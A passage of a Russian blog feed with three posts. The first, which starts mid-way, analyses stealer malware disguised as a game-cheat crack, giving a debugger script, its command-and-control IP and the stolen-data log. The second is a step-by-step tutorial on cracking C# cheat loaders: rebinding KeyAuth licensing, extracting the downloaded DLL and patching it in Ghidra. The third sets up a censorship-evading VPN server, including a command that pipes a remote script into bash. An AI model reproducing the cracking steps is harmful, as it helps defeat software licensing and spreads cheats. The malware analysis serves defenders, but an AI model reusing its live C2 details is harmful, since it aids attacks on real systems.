$currentProcId = 0

addr = 008AF941
bp addr
SetBreakpointCommand addr, &quot;scriptcmd call check_proc_id&quot;
ret

check_proc_id:
$currentProcId = arg.get(1)
log &quot;OpenProcess({$currentProcId})&quot;
cmp $currentProcId, 0x6C0
je found
erun
ret

found:
inc $handleCounter
cmp $handleCounter, 4
je found2
erun
ret

found2:
msg &quot;gay found&quot;
ret</pre>
  <p id="tXEW">знаю, что я мог просто добавить условие бряка по другому, облегчив себе немного жизнь, но я чет забыл про это)0</p>
  <p id="2Oge">Так вот, попав в момент, когда малварь начал сканировать msedge.exe, я начал трассировать, и дошел до функции isNetworkCookieObject, где фигурируют два вызова <strong>NtQueryObject</strong>.</p>
  <p id="oX9f">Один вернул мне <strong>0xC0000004 (STATUS_LENGTH_MISMATCH)</strong>, а второй вызов <strong>дедлокнул </strong>поток, на месте самого разработчика я бы выносил эту функцию в отдельный поток, да бы она не препятствовала работе основного потока.</p>
  <p id="tE7w">Подробнее про <strong>NtQueryObject </strong>и причину дедлока можете почитать на этих источниках:<br /><a href="https://www.blast.hk/redirect/aHR0cHM6Ly93YXNtLmluL3RocmVhZHMvdm9wcm9zLXBvLW50cXVlcnlvYmplY3QtZGVhZGxvY2suNjc4" target="_blank">https://wasm.in/threads/vopros-po-ntqueryobject-deadlock.678</a></p>
  <p id="5oK1"><a href="https://www.blast.hk/redirect/aHR0cHM6Ly9mb3J1bS5zb3VyY2VzLnJ1L2luZGV4LnBocD9zaG93dG9waWM9NjQwNTI" target="_blank">NtQueryObject виснет намертво :-\ -&gt; Форум на Исходниках.Ру (sources.ru)</a><br /><a href="https://www.blast.hk/redirect/aHR0cHM6Ly93d3cucnNkbi5vcmcvZm9ydW0vYXNtLzMzNjQ0NjQuaG90" target="_blank">NtQueryObject и W2K3 - в чем там проблема? - Низкоуровневое программирование - RSDN</a></p>
  <p id="mGad">А если вкратце, то причина дедлока может быть разной, одна из версий гласит про <strong>запрет использования специальных именованных пайп-каналов, которая и приводит к дедлоку</strong>.</p>
  <p id="8U0N"><strong>Отправка логов на сервер</strong></p>
  <p id="Hnl5">Занопав функцию, которая мешала мне, малварь начал подготовку отправки логов на сервер, что для начала идёт подсчёт количество собранной информации - пароли, куки, автозаполнения, и прочая информация, по типу винды, оперативы, гпу, цпу и тд.</p>
  <p id="Xqg7">Затем происходит подключение к <strong>109.94.208.20</strong>, и начинает соединять всю собранную информацию в одну строку:<br />Код:</p>
  <pre data-lang="" id="JaIF">- Passwords: 0
- Cookies: 0
- Autofill: 0
- Cards: 0
- Files: 1
- BuildTag: midnight ; Т.к. наш юзер распространяет этот малварь под разными читами, то в логе он помечает с какого именно псевдо-чита он заразил пользователя, мой семпл, например, был якобы кряком миднайта.
- PC Hash: e4379b4b38e56460add653458a687e0f
- UserID: 1191696757
- Windows: 10
- Windows Username: 57
- RAM: 8191 MB
- GPU: Penis
- CPU: AMD Ryzen 5 3600 6-Core Processor           
- HWID: {58007656-f0da-11ee-ba17-806e6f6e6963}
- ScreenSize: 3238x1280
- BuildPath: C:\Users\57\Desktop\Midnight Loader.exe</pre>
  <p id="OvTj">И вся это строка проходится по довольно банальной шифровке -&gt; base64.</p>
  <p id="UWdh">На выходе мы получаем такую строчку:<br />Код:</p>
  <pre data-lang="" id="FgXt">LSBQYXNzd29yZHM6IDAKLSBDb29raWVzOiAwCi0gQXV0b2ZpbGw6IDAKLSBDYXJkczogMAotIEZpbGVzOiAxCi0gQnVpbGRUYWc6IG1pZG5pZ2h0Ci0gUEMgSGFzaDogZTQzNzliNGIzOGU1NjQ2MGFkZDY1MzQ1OGE2ODdlMGYKLSBVc2VySUQ6IDExOTE2OTY3NTcKLSBXaW5kb3dzOiAxMAotIFdpbmRvd3MgVXNlcm5hbWU6IDU3Ci0gUkFNOiA4MTkxIE1CCi0gR1BVOiBQZW5pcwotIENQVTogQU1EIFJ5emVuIDUgMzYwMCA2LUNvcmUgUHJvY2Vzc29yICAgICAgICAgICAgICAKLSBIV0lEOiB7NTgwMDc2NTYtZjBkYS0xMWVlLWJhMTctODA2ZTZmNmU2OTYzfQotIFNjcmVlblNpemU6IDMyMzh4MTI4MAotIEJ1aWxkUGF0aDogQzpcVXNlcnNcNTdcRGVza3RvcFxNaWRuaWdodCBMb2FkZXIuZXhl</pre>
  <p id="S5EM">Отправляя её, следом отправляется и следующий пакет, содержащий архив с нашими данными, указатель которой находится в выделенной памяти, вот как выглядит архив:</p>
  <figure id="Y6tT" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2F3dGNYw6%2FPasted-image-20240407192918.png&hash=dedd5c07b0bc9fade182d6ef556f079b" width="688" />
  </figure>
  <p id="Y2Ld"><strong>Заключение</strong></p>
  <p id="Rvwo">К сожалению, на сегодняшний день очень много людей, которые не проверяют файлы на наличие вирусов и верят всему подряд, пользуйтесь действительно проверенными временем источниками, такими как <strong>Underical</strong> или <strong>ExLoader</strong>, берегите себя!</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@metasteall/HowToCrackCheats</guid><link>https://teletype.in/@metasteall/HowToCrackCheats?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall</link><comments>https://teletype.in/@metasteall/HowToCrackCheats?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall#comments</comments><dc:creator>metasteall</dc:creator><title>КАК КРЯКАТЬ ЧИТЫ 2024?</title><pubDate>Sun, 13 Oct 2024 18:57:26 GMT</pubDate><category>Обучение</category><description><![CDATA[<img src="https://www.blast.hk/attachments/185192/"></img>Короче, в этой теме я научу вас крякать некоторые софты.
разбор лоадера на шарпе.
уровень защиты которых - известный одноименный чит, не &quot;имеющий аналогов и тп&quot;.
Давайте начнем с того, что нас понадобится из ПО?
1. Лаунчер чита(лоадер)
2. Detect Is Easy
3. Ghidra(название отличается от не очень известного закрытого сайта)
4. dnSPY
5. И самое сложное, iq &gt;50
6. Ну и там чисто на удачу, мб понадобится какой нить дампер вмп, но там уже сами, там рандом, смотря как накрыт плагин]]></description><content:encoded><![CDATA[
  <p id="UlCH" data-align="center">Короче, в этой теме я научу вас крякать некоторые софты.<br />разбор лоадера на шарпе.<br />уровень защиты которых - известный одноименный чит, не &quot;имеющий аналогов и тп&quot;.<br />Давайте начнем с того, что нас понадобится из ПО?<br />1. Лаунчер чита(лоадер)<br />2. Detect Is Easy<br />3. Ghidra(название отличается от <s>не очень известного</s> закрытого сайта)<br />4. dnSPY<br />5. И самое сложное, iq &gt;50<br />6. Ну и там чисто на удачу, мб понадобится какой нить дампер вмп, но там уже сами, там рандом, смотря как накрыт плагин</p>
  <p id="vQLN" data-align="center">По пунктам<br />1. Берем лоадер и и детектим либу, для этого мы перекидываем лоадер в прогу Detect Is Easy</p>
  <figure id="Qbu1" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185192/" width="103" />
  </figure>
  <figure id="KwgS" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185195/" width="702" />
  </figure>
  <p id="HkZO" data-align="center">Что мы видим?<br />Шикарная вещь, .NET(бла бла), это короче очень крутая тема, кому я это вообще объясняю? Те кто знают, те знают, остальные загуглят.</p>
  <p id="eqCM" data-align="center">2. Короче, мы поняли, прога написана на шарпе, все круто, открываем настоящий ужас, программу dnSpy</p>
  <figure id="DgRW" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185193/" width="89" />
  </figure>
  <p id="717a" data-align="center">Скорее всего, открыв ее в первый раз, вы испугаетесь цифорок, буковок и закроете ее.<br />По итогу, собравшись с силами вы все таки откроете эту программу и поймете, страшного в ней ничего нет. Давайте подумаем, как работает самый просто лаунчер чита? Полюбому они не будут все аккаунты и тп. Хранить в своей базе данных, а будут использовать готовый апи, наверное самый популярный будет KeyAuth.<br />В левой панеле элементов, находим перекинутый лаунчер в нашу прогу,</p>
  <figure id="jKL9" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185196/" width="322" />
  </figure>
  <p id="3hrf" data-align="center">После чего тыкаем на треугольник слева и у нас открывается, много новых кнопок с картинками, нам надо то, что отвечает за авторизацию и основной код программы, тыкаем сюда</p>
  <figure id="9DAS" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185197/" width="152" />
  </figure>
  <p id="Kk2S" data-align="center">жмем треугольник и у нас открывается еще больше кнопочек, нам надо найти то, где хранится HWID привязка, находится она как не странно в кнопке с названием Login!</p>
  <figure id="6CCn" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185198/" width="245" />
  </figure>
  <p id="CDQv" data-align="center">Тыкаем на нее и у вас откроется код слева, круто думаете вы, сейчас примените свои знания паскаля из школьной программы, но не тут то было, вы осознаете, что код на с#!<br />Ищем строку отвечающую за панель управления:</p>
  <figure id="t1yW" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185199/" width="951" />
  </figure>
  <p id="jlru" data-align="center">Там у вас будет немного по другому, я просто решил, что будет гуманно, если я не буду показывать эти данные, короче все очень просто, вы регаетесь на сайте KeyAuth, создаете свою панель и вписываете уже ваши данные сюда, после чего компилим код и получаем, что лаунчер привязан к вашей панеле, круто, вы кул хацкеры, если вам этого достаточно, можете закрывать тему.</p>
  <p id="IlNU" data-align="center">Теперь пришло время для более крутых людей, которые хотят получить дллку.<br />Тут все еще проще, ищем основное окно, чаще всего main</p>
  <figure id="LfDt" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185200/" width="219" />
  </figure>
  <p id="Hn2j" data-align="center">Тут находим кнопочку, отвечающую за инжект, обычно после нажатия на такую кнопочку, идет подгрузка файлика с дллкой на ваш пк, вам остается лишь найти ссылку на этот файлик.<br />Короче тыкаем на кнопочку inject</p>
  <figure id="VbQQ" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185201/" width="253" />
  </figure>
  <p id="We5R" data-align="center">И видим еще куча кода, ищем прямую ссылку на нашу дллку, ее можно найти и с помощью wireshark, после проделанной нами 1 части, но мне удобнее вот так, короче вот наша ссылка ниже, но перед ней вы увидете такой страшный кусок кода, как WebClient, если вы такое нашли, то вы на правильном пути.</p>
  <figure id="Au6p" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185202/" width="369" />
  </figure>
  <figure id="1yI1" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185203/" width="1137" />
  </figure>
  <p id="qEHA" data-align="center">Мы короче качаем нашу дллку, еще как вариант, можно перехватить дллку, во время ее инжекта, заморозив прогу через процесс хакер, заранее при этом нужно найти путь, куда она сохраняется,</p>
  <figure id="jQmB" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185204/" width="403" />
  </figure>
  <p id="9Uvg" data-align="center">Вам остается лишь забрать дллку из этой директории.<br />3. Вы выдохнули и подумали, что ваши мучения кончились, предположим вам захотелось показать какой вы крутой и поменять название чита на ваш никнейм Майнкрафтер2014, и для этого нам нужен реальный ужас, программа с тремя головами!</p>
  <figure id="s3QH" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185205/" width="98" />
  </figure>
  <p id="i4z5" data-align="center">Идой я не пользуюсь, мне она не нрав, так что да…<br />Вот, обьяснять че в ней происходит я не буду, просто говорю куда тыкать и самое главное давайте представим, что эта дллка не защищена темидой или вмп, так как обьснять как дампить вма мне лень, так что если там протектор, то не судьба… вы все равно не поймете че в этой проге написано поэтому говорю, что делаем, закидываем файл, анализируем, тыкаем на Search, потом Program Text</p>
  <figure id="bFF4" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185206/" width="284" />
  </figure>
  <p id="oC4s" data-align="center">Ищем название чита, выбрав поля</p>
  <figure id="7rQV" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185207/" width="191" />
  </figure>
  <figure id="4oog" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185208/" width="121" />
  </figure>
  <p id="5NvB" data-align="center">жмем Search (с англ. - Поиск)<br />Находим строку с нашим названием в окне дизассемблера( это короче окошко слева ) это типо вот так будет выглядить</p>
  <figure id="Rk7b" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185209/" width="146" />
  </figure>
  <p id="sQiX" data-align="center">, мы тыкаем по этой штуки правой кнопкой мыши и жмем clear bytes, видим какие то цифры, с буквами, че за ужас думаете вы</p>
  <figure id="vWcj" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185210/" width="118" />
  </figure>
  <p id="7ukv" data-align="center">теперь нам требуется 5 пункт, а именно iq&gt;50 , ищем в инете string to bytes, вводим нужное название и получаем байтики, справа у вас есть менюшка редактора хекса(цифорки там разные), тыкаете на карандашик и теперь цифорки можно редактировать, вы тыкаете на нужную вам буковку и попадаете в хексе, на ее байты, их заменяете на нужные вам байты, типо вот так</p>
  <figure id="cMxp" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185212/" width="196" />
  </figure>
  <p id="Zg3A" data-align="center">На выходе получаем че то типо</p>
  <figure id="W8RI" class="m_custom" data-caption-align="center">
    <img src="https://www.blast.hk/attachments/185213/" width="139" />
  </figure>
  <p id="d0KL" data-align="center">Экспортируем вашу дллку, меняем формат на аси, или просто инжектим в игру и радуемся.</p>
  <p id="V1Jc"></p>
  <section style="background-color:hsl(hsl(323, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h3 id="b2gk" data-align="center">В 2024 году мал шанс что вы найдете лоадер написанный на шарпе, но все может быть. Как для кряка какой-то пасты - нормально.</h3>
  </section>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@metasteall/HowToOpenVpnServer</guid><link>https://teletype.in/@metasteall/HowToOpenVpnServer?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall</link><comments>https://teletype.in/@metasteall/HowToOpenVpnServer?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall#comments</comments><dc:creator>metasteall</dc:creator><title>СОЗДАЁМ СВОЙ НАДЕЖНЫЙ VPN СЕРВЕР. НАСТРОЙКА VLESS XTLS Reality</title><pubDate>Sun, 13 Oct 2024 18:46:39 GMT</pubDate><media:content medium="image" url="https://img1.teletype.in/files/0c/37/0c3709bf-de45-495c-8dcc-1d5ab93f777a.png"></media:content><category>VPN</category><description><![CDATA[<img src="https://nztcdn.com/files/cd05bba0-288d-42ee-a8d1-db000ae22106.webp"></img>В данной статье описан способ обхода западной цензуры на примере использования протокола VLESS XTLS Reality для доступа к сайтам, которые блокируют доступ из Российской Федерации.
На текущий момент vless‑xtls‑reality не может быть обнаружен с помощью DPI (deep packet inspection — прослушивание трафика) даже в Китае. Но у регулятора есть иные способы помешать ему. Поэтому смотрим следующий список:
Что не стоит делать ни в коем случае Не компрометировать VPSпротоколами, которые могут быть детектированы (не ставить туда WireGuard, OpenVPN, Shadowsocks, ...). Некоторые провайдеры блокируют VPS, на которых в прошлом были замечены подобные протоколы.]]></description><content:encoded><![CDATA[
  <p id="pwg7"><em>В данной статье описан способ обхода западной цензуры на примере использования протокола VLESS XTLS Reality для доступа к сайтам, которые блокируют доступ из Российской Федерации.</em><br />На текущий момент vless‑xtls‑reality не может быть обнаружен с помощью DPI (deep packet inspection — прослушивание трафика) даже в Китае. Но у регулятора есть иные способы помешать ему. Поэтому смотрим следующий список:<br />Что не стоит делать ни в коем случае <strong>Не компрометировать VPS</strong>протоколами, которые могут быть детектированы (не ставить туда WireGuard, OpenVPN, Shadowsocks, ...). Некоторые провайдеры блокируют VPS, на которых в прошлом были замечены подобные протоколы.</p>
  <ol id="I2xX">
    <li id="mtiN"><strong>Не компрометировать VPS протоколами, которые могут быть детектированы (не ставить туда WireGuard, OpenVPN, Shadowsocks, ...). Некоторые провайдеры блокируют VPS, на которых в прошлом были замечены подобные протоколы.</strong></li>
    <li id="pqLb"><strong>Не ходить в рунет через VPS</strong>, вместо этого посещать рунет напрямую, мимо прокси (легко настроить). В крайнем случае, пускать российский трафик по цепочке Я-&gt;VPS-&gt;Warp-&gt;Рунет (это тоже легко настроить). Дело в том, что если трафик пересекает границу РФ дважды в условную секунду (сначала туда, потом сразу обратно), то цензор может заподозрить прокси и заблокировать его. В Китае так делают, у нас - нет, но могут научиться в любой момент.</li>
    <li id="zcIF"><strong>Не раздавать доступ к прокси</strong>большому количеству людей. 5-10 близких максимум. В Китае вычисляют аномальный трафик к серверу от большого числа юзеров (и блокируют сервер), наше провайдеры могут перенять их опыт в любой момент.</li>
  </ol>
  <p id="3nO3">При выполнении этих условий (в текущих реалиях) доступ к серверу невозможно отключить. Однако, я люблю избыточную надёжность, поэтому... на случай неожиданной блокировки VPS‑сервера по IP — есть «<strong>План Б</strong>»: проксирование трафика через CDN (Content Delivery Network).CDN CloudFlare</p>
  <p id="hFmi">CDN созданы для балансировки трафика крупных сайтов, состоят из сотен IP‑адресов, поэтому шанс их блокировки в РФ минимальный. Я использую одну из самых крупных CDN в мире — CloudFlare с бесплатным тарифом. Именно к CloudFlare вы привяжете купленный домен, чтобы пускать трафик через него.<br />Проксирование через CDN чуть медленнее прямого коннекта к серверу. Зато, при использовании CDN, Роскомнадзор вообще не узнает IP вашего сервера.</p>
  <p id="Lg7O"><strong>CloudFlare Warp</strong><br />Warp - это сеть публичных прокси от той же корпорации CloudFlare, доступ туда происходит по VPN-протоколу WireGuard. Из РФ к Warp-у, конечно же не подключишься, но из зарубежного VPS - запросто.<br />В этой схеме Warp исполняет две функции:</p>
  <ol id="9WDw">
    <li id="pkMP">Дополнительный инструмент для обхода западной цензуры (если некоторые западные сайты не приветствуют запросы с вашего VPS - вы сможете зайти на них через Warp)</li>
    <li id="iK6y">Доп. защита от блокировок: проксирование запросов от VPS в Рунет, чтобы не компрометировать VPS в глазах РКН. Это на случай, если вы не настроили клиентское приложение для прямого доступа в ru-ресурсам. Конечно, не все ru-сайты готовы обслуживать запросы из-за границы, например: сайт Почты России почти наверняка не откроется через Warp, но большинство ru-сайтов откроется.</li>
  </ol>
  <p id="SdVe"><strong>Независимость от корпораций</strong><br />Если CloudFlare вдруг исчезнет, вся схема продолжит работать напрямую, при этом останется возможность подключиться к любой другой CDN (из десятки), а вместо Warp использовать любой другой зарубежный прокси. Но пока всё работает - можно использовать CloudFlare.<br />На этом теория окончена, перехожу к инструкции.<br /><em>Говоря о том, что нам там предлагают под наши цели — это виртуальные VPS сервера, расположенные в странах европы, России и США. С реальной скоростью соединения с сервером примерно 500 мбит/с и безлимитным трафиком (что очень важно для VPN сервера) . Лично я буду использовать хостера Aeza - дешевый и относительно стабильный, с нормальными хар-ми сервера.</em><br /><strong>Итак, </strong>если вы, всё-таки решили арендовать сервер у Аезы, а не пошли писать гневные комментарии под моим постом этому поводу, то <strong>алгоритм действий такой:</strong><br /><strong>1.</strong> Для начала вам нужно перейти <a href="https://aeza.net/?ref=554146" target="_blank">по этой ссылке</a> зарегистрироваться, и перейти в личный кабинет.<br /><strong>2.</strong> Далее, нажмите на <strong>Виртуальный сервер, </strong>выберите нужную <strong>страну</strong>, тариф <strong>Shared </strong>и минимальную конфигурацию сервера.</p>
  <figure id="dXZv" class="m_original">
    <img src="https://nztcdn.com/files/cd05bba0-288d-42ee-a8d1-db000ae22106.webp" width="1200" />
  </figure>
  <p id="1cOw"><strong>3.</strong> На наш сервер нужно установить операционную систему <strong>Debian 12</strong>— её и выберите. <strong>Отключите бекапы</strong> — тут они не нужны (в случае чего всё можно быстро переустановить) . Выберите период оплаты и, собственно, оплатите аренду.</p>
  <blockquote id="aQbz">Кстати, после регистрации по моей реферальной ссылке у вас <strong>в течении 24 часов </strong>будет<strong> бонус 15% к пополнению баланса.</strong></blockquote>
  <p id="VLpH"><strong>Минуты 2-3 сервер будет активироваться</strong>и после на почту придут данные для авторизации для подключения к серверу. <strong>Либо</strong>, ip-адрес и пароль можно будет посмотреть в разделе <strong>мои услуги</strong> и нажать на название вашего сервера.</p>
  <p id="F4Tq">Инструкция (1/6) - настройка VPS</p>
  <p id="a7nl">Как только вы приобрели VPS‑сервер с уже установленной туда чистой Debian 12 — как правило в течении нескольких минут провайдер выдаст вам доступ к серверу. Чаще всего приходит e‑mail, иногда данные можно найти в панели.<br />В моем случае с aeza - данные есть и на почте и в личном кабинете.</p>
  <figure id="LQhH" class="m_original">
    <img src="https://nztcdn.com/files/dc08510f-1825-4ec6-ae9a-2ec94b5869a0.webp" width="1200" />
  </figure>
  <p id="taAW">Вам нужны две строки: IP-адрес и root-пароль</p>
  <p id="PEA4"><strong>Шаг 1:</strong> Подключитесь к серверу по SSH:</p>
  <ul id="Ztf5">
    <li id="vDLb">Наберите ssh root@111.111.111.111 в консоли (IP поменяйте на свой).</li>
  </ul>
  <p id="nEG6"><em>Пароль можно вставить из буфера с помощью ПКМ, он не отображается для безопасности. Иногда пароль вставляется корректно только при включённой английской раскладке клавиатуры.</em></p>
  <ul id="g1eN">
    <li id="kAQE">Либо используйте веб-интерфейс &quot;VNC&quot; в панели VPS</li>
    <li id="Lzha">Либо используйте какое-либо SSH-приложение (подойдет командная строка)</li>
  </ul>
  <figure id="CsTB" class="m_original">
    <img src="https://nztcdn.com/files/1197dfa7-e369-4af3-8b4f-fd3665b5e4a2.webp" width="978" />
  </figure>
  <p id="9Paz"><strong>Шаг 2:</strong> Обновите систему на сервере</p>
  <blockquote id="EfkZ">apt update &amp;&amp; apt full-upgrade -y</blockquote>
  <p id="DT7l">(займёт несколько минут)<br /><strong>Шаг 3:</strong> Перезагрузитесь reboot и через минуту подключитесь по ssh заново.<br /><strong>Шаг 4:</strong>Установите необходимые пакеты:</p>
  <blockquote id="O7ko">apt install</blockquote>
  <figure id="2wKz" class="m_original">
    <img src="https://lolz.live/proxy.php?image=https%3A%2F%2Fwww.docker.com%2Fwp-content%2Fuploads%2F2023%2F06%2Fmeta-image-homepage-1110x580.png&hash=8edcc3a3086ee762320f248ee66d31be" />
  </figure>
  <blockquote id="i4yS"><a href="https://lolz.live/proxy.php?link=https%3A%2F%2Fdocker.io&hash=a224971af2304abce37259a65162230a" target="_blank">Docker: Accelerated Container Application Development</a>Docker is a platform designed to help developers build, share, and run container applications. We handle the tedious setup, so you can focus on the code.docker.iodocker-compose git curl bash openssl nano -y</blockquote>
  <p id="sikP"><strong>Шаг 5</strong>: Установите панель 3X-UI версии v2.0.2:</p>
  <blockquote id="yLgf">git clone <a href="https://lolz.live/proxy.php?link=https%3A%2F%2Fgithub.com%2FMHSanaei%2F3x-ui.git&hash=e78138c58ca5009da4821f752e701642" target="_blank">https://github.com/MHSanaei/3x-ui.git</a><br />cd 3x-ui<br />nano docker-compose.yml<br /># откроется текстовой редактор.<br /># в 6 строке замените &quot;latest&quot; на &quot;v2.0.2&quot;<br /># было: image:</blockquote>
  <figure id="9b0y" class="m_original">
    <img src="https://lolz.live/proxy.php?image=https%3A%2F%2Fgithub.githubassets.com%2Fassets%2Fgithub-logo-55c5b9a1fe52.png&hash=299b2769f1a291814921114fd143b4a2" />
  </figure>
  <blockquote id="20mr"><a href="https://lolz.live/proxy.php?link=https%3A%2F%2Fghcr.io%2Fmhsanaei%2F3x-ui%3Alatest&hash=a9b5f4a4335312cd9e27ca8e11ed27a4" target="_blank">Package 3x-ui · GitHub</a>GitHub is where people build software. More than 100 million people use GitHub to discover, fork, and contribute to over 420 million projects.ghcr.io<br /># стало: image:</blockquote>
  <figure id="yPok" class="m_original">
    <img src="https://lolz.live/proxy.php?image=https%3A%2F%2Fgithub.githubassets.com%2Fassets%2Fgithub-logo-55c5b9a1fe52.png&hash=299b2769f1a291814921114fd143b4a2" />
  </figure>
  <blockquote id="lz9Z"><a href="https://lolz.live/proxy.php?link=https%3A%2F%2Fghcr.io%2Fmhsanaei%2F3x-ui%3Av2.0.2&hash=24228f7393b0c12a0628bb5b9934e894" target="_blank">Package 3x-ui · GitHub</a>GitHub is where people build software. More than 100 million people use GitHub to discover, fork, and contribute to over 420 million projects.ghcr.io<br /># чтобы сохранится, нажмите: CTRL+X, Y, ENTER<br />docker-compose up -d</blockquote>
  <figure id="zGu6" class="m_original">
    <img src="https://nztcdn.com/files/0d87c5f4-d979-4086-bb9d-70b2ac857167.webp" width="345" />
  </figure>
  <p id="uMRF">Важно</p>
  <p id="Ullg"><strong>Шаг 6:</strong>Установите Warp: первой командой - удалите (если он был установлен хостером), второй - установите его в режиме совместимости с 3x-ui</p>
  <blockquote id="iVKy">warp u<br />bash &lt;(curl -sSL <a href="https://lolz.live/proxy.php?link=https%3A%2F%2Fraw.githubusercontent.com%2Fhamid-gh98%2Fx-ui-scripts%2Fmain%2Finstall_warp_proxy.sh&hash=8f0180bd9f538fc7126c7d6ae3708155" target="_blank">https://raw.githubusercontent.com/hamid-gh98/x-ui-scripts/main/install_warp_proxy.sh</a>)</blockquote>
  <p id="NV75">Во время установки скрипт спросит у вас цифру, нужно ответить 40000<br /><strong>Шаг 7</strong>: Сгенерируйте самоподписанный TLS-сертификат и скопируйте его в панель 3X-UI</p>
  <blockquote id="q7We">openssl req -x509 -newkey rsa:4096 -nodes -sha256 -keyout private.key -out public.key -days 3650 -subj &quot;/CN=APP&quot;<br />docker cp private.key 3x-ui:private.key<br />docker cp public.key 3x-ui:public.key</blockquote>
  <p id="YniM"><strong>На этом настройка сервера завершена.</strong><br />Можно шаманить дальше, чтобы повышать уровень безопасности сервера и качество его маскировки, но «для старта» я считаю это излишним. Минимально необходимые настройки для стабильной работы сервера вы выполнили.Инструкция (2/6) - первичная настройка панели 3X-UI</p>
  <figure id="yeey" class="m_original">
    <img src="https://nztcdn.com/files/b719d699-8bb3-4ca7-98e0-94bdd51a9696.webp" width="320" />
  </figure>
  <p id="WT0i"><strong>Шаг 1:</strong> Откройте браузер и зайдите по адресу вида <a href="https://lolz.live/proxy.php?link=http%3A%2F%2F111.111.111.111%3A2053%2F&hash=786f0e5e915f1733aa02eda6894556c2" target="_blank">http://111.111.111.111:2053/</a> Обратите внимание на http (не https) в начале адреса (но это только на старте, далее будет https). IP, конечно, нужно поменять на свой.</p>
  <p id="iJge"><strong>Шаг 2:</strong> Поменяйте язык на английский (в русском кривой перевод), тёмную тему, логин: admin, пароль: admin, и войти (кнопка Login).</p>
  <figure id="BzGh" class="m_original">
    <img src="https://nztcdn.com/files/3aabe218-435a-432f-b5f1-bb01eef645c4.webp" width="640" />
  </figure>
  <p id="jfMP"><strong>Шаг 3</strong>: В разделе &quot;Panel Settings&quot; заполните 4 поля как на скриншоте:</p>
  <p id="QGsD"><strong>- Panel Port</strong> (любое случайное число от 1000 до 65535, кроме 40000 - оно уже занято варпом, в инструкции я буду использовать 54321 - но вы придумайте своё). <em>Далее везде вместо порта 54321 вставляйте своё число</em>.<br /><strong>- Panel Certificate</strong> <strong>Public</strong> Key Path : /public.key<br /><strong>- Panel Certificate</strong> <strong>Private</strong> Key Path : /private.key<br /><strong>- Panel URL</strong> Root Path: секретная строка для доступа к панели, которая начинается и заканчивается &quot;/&quot;. Я использую /mysecreturl/, но вы придумайте свою. <em>Далее везде вместо строки </em>/mysecreturl/<em>используйте свою</em>.<br />Наконец, сохранитесь (кнопка Save вверху страницы) и обязательно перезагрузите панель (кнопка Restart Panel, Sure).</p>
  <ul id="HP6m">
    <li id="TAHn"><strong>Браузер выдаст ошибку</strong>. Поменяйте в адресной строке порт 2053 на 54321, обновите страницу.</li>
    <li id="2VO5"><strong>Браузер выдаст вторую ошибку</strong>«Подключение не защищено» (<em>это потому что мы используем самоподписанный сертификат, но это временно</em>). Нажмите на Дополнительно→Перейти на сайт, и вы опять окажетесь в панели.</li>
  </ul>
  <figure id="JgoA" class="m_original">
    <img src="https://nztcdn.com/files/21e0775f-47f3-4322-8f43-b0938947925b.webp" width="480" />
  </figure>
  <p id="yqKh"><strong>Шаг 4:</strong> В разделе Panel Settings -Security Settings укажите старые(admin/admin) и придумайте новые логин и пароль, жмите Confirm.</p>
  <p id="OilS"><strong>Шаг 5:</strong> Войдите в панель ещё раз с новым логином и паролем.<br />Теперь панель будет всегда доступна по HTTPS адресу вида: <a href="https://lolz.live/proxy.php?link=https%3A%2F%2F111.111.111.111%3A54321%2Fmysecreturl%2F&hash=8166e760fdd00b193c7c5560f4bdbce5" target="_blank">https://111.111.111.111:54321/mysecreturl/</a> (где IP, Порт и Путь будут вашими собственными).<br />Сохраните где-нибудь URL доступа к панели, логин и пароль. Инструкция (3/6) - настройка Xray</p>
  <p id="2pZS">Xray - прокси-сервер, которым управляет панель 3X-UI. Именно Xray поддерживает протокол VLESS с маскировкой.</p>
  <figure id="SsVz" class="m_original">
    <img src="https://nztcdn.com/files/f879535f-92af-4665-9f14-61b35164d130.webp" width="640" />
  </figure>
  <p id="SfRC"><strong>Шаг 1:</strong> В панели перейдите в раздел &quot;Xray Settings&quot; и включите две опции:</p>
  <p id="YBJd"><strong>- IPv4 Configs</strong> -&gt; Use IPv4 for Google<br /><strong>- WARP Configs</strong> -&gt; Route OpenAI (ChatGPT) througw WARP.<br />Затем в верху страницы сохранитесь (Save Settings) и перезагрузитесь (Restart Xray)</p>
  <figure id="TWdt" class="m_original">
    <img src="https://nztcdn.com/files/4c162c05-efab-425b-9726-7fe30bc53559.webp" width="480" />
  </figure>
